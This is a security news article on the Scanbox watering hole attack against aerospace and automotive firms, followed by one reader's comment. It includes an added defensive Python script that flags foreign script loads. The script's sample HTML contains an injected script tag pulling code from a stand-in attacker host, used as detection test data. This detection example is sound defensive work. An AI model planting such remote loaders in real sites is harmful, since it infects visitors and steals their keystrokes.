Watering Hole Attack Targets Automotive, Aerospace Industries


A new watering hole attack is targeting the aerospace, automotive and manufacturing industries with a new reconnaissance malware tool called “Scanbox.”

Attackers managed to load malware onto the website of a prominent company involved in the development of simulation and systems engineering software widely used within the automotive, aerospace and manufacturing industries.

These types of attacks are referred to as watering holes because, like a predator waiting passively near a water source to ambush prey, attackers compromise a site likely frequented by their intended victim. When the target visits the compromised site, he is infected with malware designed to pilfer intellectual property or establish a presence within a targeted network.

According to an AlienVault report penned by Jaime Blasco, attackers compromised the unnamed website with a string of code that loads a malicious JavaScript file from a remote server onto the machines of visitors. Contained within that file is a reconnaissance tool known as “Scanbox.”
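As an added example (not from the article or the AlienVault report), the following Python flags `<script src>` tags on a page that point at hosts other than the site's own or an allowlisted CDN, which is the check a site owner would run to spot an injected remote loader of the kind described here. The HTML and hostnames are constructed placeholders.

```python
"""Flag third-party <script src> loads on a page, as a site owner would when
checking for a watering-hole injection like the one described above.

Added example; the HTML below is constructed and 'evil.example' is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_foreign_scripts(html, page_url, allowed_hosts=()):
    """Return script URLs whose host is neither the page's own host nor an allowed one.

    Relative and protocol-relative srcs are resolved against page_url first, so
    '//cdn.example/x.js' and '/js/app.js' are classified correctly. A src with no
    host at all (e.g. a javascript: or data: URL) is also reported.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    own_host = urlsplit(page_url).hostname
    allowed = {h.lower() for h in allowed_hosts} | {own_host.lower()}
    foreign = []
    for src in parser.srcs:
        resolved = urljoin(page_url, src.strip())
        host = urlsplit(resolved).hostname
        if host is None or host.lower() not in allowed:
            foreign.append(resolved)
    return foreign


# Constructed sample: a normal page with one injected remote script tag.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="//cdn.example/lib.min.js"></script>
<script type="text/javascript" src="http://evil.example/js.php?v=1"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for url in find_foreign_scripts(SAMPLE_HTML, "https://vendor.example/", ["cdn.example"]):
        print("unexpected third-party script:", url)
```

Running it against a baseline snapshot of the site's own pages turns a one-off check into a periodic integrity monitor.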

After infection, Blasco writes, Scanbox checks the compromised machine for the website referer, User-Agent, Location, Cookie, Title (to identify the specific content the victim is visiting), Domain, Charset, Screen width and height, Operating System, and Language. Before transmitting this data to the command and control server, Scanbox encodes and encrypts the acquired data.

Blasco says the recon tool also contains a number of additional plugins designed to steal other valuable data.

One plugin checks which software – security software in particular – and which version of Microsoft’s Enhanced Mitigation Experience Toolkit are present on an infected machine. Other plugins enumerate the Adobe Flash, Microsoft Office, Adobe Reader and Java versions respectively. Yet another plugin is a JavaScript-based keylogger.

“While the user is browsing the compromised website, all keystrokes are being recorded and sent to the C&C periodically,” Blasco writes. “It will also send keystrokes when the user submits web forms that can potentially include passwords and other sensitive data.”


Discussion

  • redwolfe_98 on

    at first, i thought this "threat" sounded serious, but, on second thought, it doesn't seem like it can do much.. yea, if it happens to be loaded and running while you are logging into your bank account, it could be an issue.. but i am thinking that since it doesn't actually install any files, there might not be much to it.. also, since it is javascript from a third-party website, i am thinking that, maybe, if scripting is disabled, it won't be able to do anything.. also, the alienvault article gave the impression that, somehow, a vulnerability in "silverlight" was involved.. so, if one doesn't have "silverlight" installed, that may also mitigate the threat.. otherwise, it is just collecting data that probably is sent in TCP packets every time that we connect to a website, like browser, OS, etc..
